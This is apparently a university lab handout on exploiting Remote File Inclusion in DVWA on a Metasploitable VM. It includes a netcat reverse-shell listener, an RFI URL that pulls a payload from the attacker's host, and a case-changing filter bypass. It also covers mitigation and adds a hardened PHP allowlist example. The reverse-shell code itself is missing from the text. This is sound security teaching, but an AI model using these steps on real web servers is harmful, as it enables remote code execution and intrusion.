Remote File Inclusion Vulnerabilities (RFI) – RoyalCustomEssays

Lab 4: Remote File Inclusion Vulnerabilities (RFI)

Objective
By completion of the lab, students should be able to:

  • identify Remote File Inclusion vulnerabilities in a website and exploit them
  • know how to mitigate such vulnerabilities in a website.

Lab Requirements

  • Desktop or laptop with either Windows or Unix OS
  • Virtual box with Kali Linux
  • Metasploitable virtual machine

Lab Description:
Remote File Inclusion is similar to Local File Inclusion vulnerabilities. This vulnerability can be exploited if the web server's PHP is configured with allow_url_fopen and allow_url_include enabled, because these settings allow any file (payload, PHP shell, ...) from any machine to be included in the target website. The steps are very similar to the previous local file inclusion lab, with one difference: we have to enable the settings that turn the local file inclusion into a remote file inclusion.

Good luck!

Lab Steps:

To enable remote file inclusion, go to your Metasploitable machine and open the PHP settings file using nano (a text editor):
sudo nano /etc/php5/cgi/php.ini
This will start a text editor where you can edit the PHP settings of the web server.
This step is necessary to test this vulnerability.
Search for the setting allow_url (to search, use Ctrl+W).
You can see that there are two settings turned On: allow_url_fopen & allow_url_include. That means that the local file inclusion vulnerability can be used as a remote file inclusion.
Exit the editor (Ctrl+X).
Restart the web server: sudo /etc/init.d/apache2 restart
Now we will try to access a file on a different server. In this case, the other server is our Kali local server (your own IP address). But if you are pen testing this on a real web server, then you need to have the file located on a real web server with an IP address or a domain name.
Create a simple PHP file with any text editor on your Kali machine and write the following code in it:

Note: this code will start a reverse shell calling back to our machine, which means you put your Kali IP address in it.
Save the file as reverse.txt in /var/www/html; this will allow Metasploitable to access the file on our Kali because both are on the same network. Note: we saved the file as .txt because we want it to be executed on Metasploitable and not on Kali.
Start the local web server on your Kali Linux by running the following command in Kali's terminal:
service apache2 start
Access the file you just saved from the web browser on your Kali: localhost/reverse.txt
You should be able to see the file you just created.
Configure the DVWA security level as low.
Now start listening for connections; from the Kali terminal type:
nc -vv -l -p 8080
To exploit remote file inclusion, from the file inclusion link in DVWA, replace include.php in the URL with the link to the file you created on your Kali machine's web server. The link should look something like this:
http://10.0.2.5/dvwa/vulnerabilities/fi/?page=http://10.0.2.15/reverse.txt?
Note: add the ? at the end of the link to execute the file as a PHP file.
Once you hit enter, you are in! Voila. Check the terminal for the reverse shell connection.
Now we will try the same with the security level set to medium. It should not work and it will give an error message. There are two options here: either they have patched the vulnerability or they are using a filter.
The filter they might be using would probably be on the http string (because usually the link will not contain http after the first one).
Replace http with hTTp and hit enter. Voila! This should work. Filters can be bypassed!
Mitigation: First, make sure you prevent remote file inclusion by disabling the two settings allow_url_fopen and allow_url_include in the php.ini file.
Second, to prevent local file inclusion, use static file inclusion. Instead of taking the file name from GET or POST, hard-code it in the code.
Instead of having the page to be included passed as a parameter, add it statically in the code.
For example (GET):
url: index.php?page=news.php
index.php code: include($_GET['page']);
Another example (POST):
url: index.php
index.php code: include($_POST['page']);
In both cases, the user can change the parameter and cause any file to be executed, either by changing the URL in the GET case or by using a proxy in the POST case.
The safe way to do it is as follows, where you hard-code whatever file you are including:
include('page.php');
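As an added example (not part of the original lab or of DVWA), the hardened form of the include pattern above: a fixed allowlist maps the page parameter to local files, so the request can pick a key but user input never reaches include(). The ./pages/ directory and the page names are assumptions.

```php
<?php
// Added example, not part of the original lab: a page router that keeps the
// lab's "hard-code the included file" advice while still letting ?page= pick
// among a few pages. Assumed layout: includable files live in ./pages/.
declare(strict_types=1);

// Vulnerable pattern from the lab, for contrast (never do this):
//     include($_GET['page']);

// Every includable file is listed here once, at deploy time. A request can
// only pick a key; it can never supply a path, a URL or a php:// wrapper.
const PAGE_ALLOWLIST = [
    'home'  => 'home.php',
    'news'  => 'news.php',
    'about' => 'about.php',
];

function resolvePage(string $requested): ?string
{
    if (!array_key_exists($requested, PAGE_ALLOWLIST)) {
        return null; // unknown key: refuse, do not try to "clean" the input
    }
    // Defence in depth: the resolved file must still sit under ./pages/.
    $base = realpath(__DIR__ . '/pages');
    $real = $base === false ? false : realpath($base . '/' . PAGE_ALLOWLIST[$requested]);
    if ($real === false || strpos($real, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $real;
}

// The php.ini directives the lab turned On should be Off in production;
// they cannot be changed from a script, so log loudly if they are still On.
foreach (['allow_url_include', 'allow_url_fopen'] as $directive) {
    if (filter_var(ini_get($directive), FILTER_VALIDATE_BOOLEAN)) {
        error_log("$directive is On: remote file inclusion is still possible");
    }
}

$requested = $_GET['page'] ?? 'home';
$page = is_string($requested) ? resolvePage($requested) : null;
if ($page === null) {
    http_response_code(404);
    exit('Unknown page');
}
include $page; // path comes from the allowlist, never from the request
```

Because the lookup is by key and unknown keys are refused outright, the case-changing trick used against the medium level (hTTp) has nothing to match: no URL, wrapper or path from the request is ever passed to include().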

Lab Assessment
For this lab assessment, follow the instructions to exploit the RFI vulnerability at the low and medium security levels, and provide me with screenshots of each step and the final reverse shell.
Also, provide a complete report on the differences in the website code between all three security levels, showing the statements used to enhance the security of the website to withstand RFI attacks.

Rubric (10 Points):
2 marks for screenshots of successful low security level exploitation
2 marks for screenshots of successful medium security level exploitation
2 marks for highlighting and explaining the problem with the low security level code
2 marks for highlighting and explaining the problem with the medium security level code
2 marks for highlighting and explaining the mitigation techniques in the high security level code.
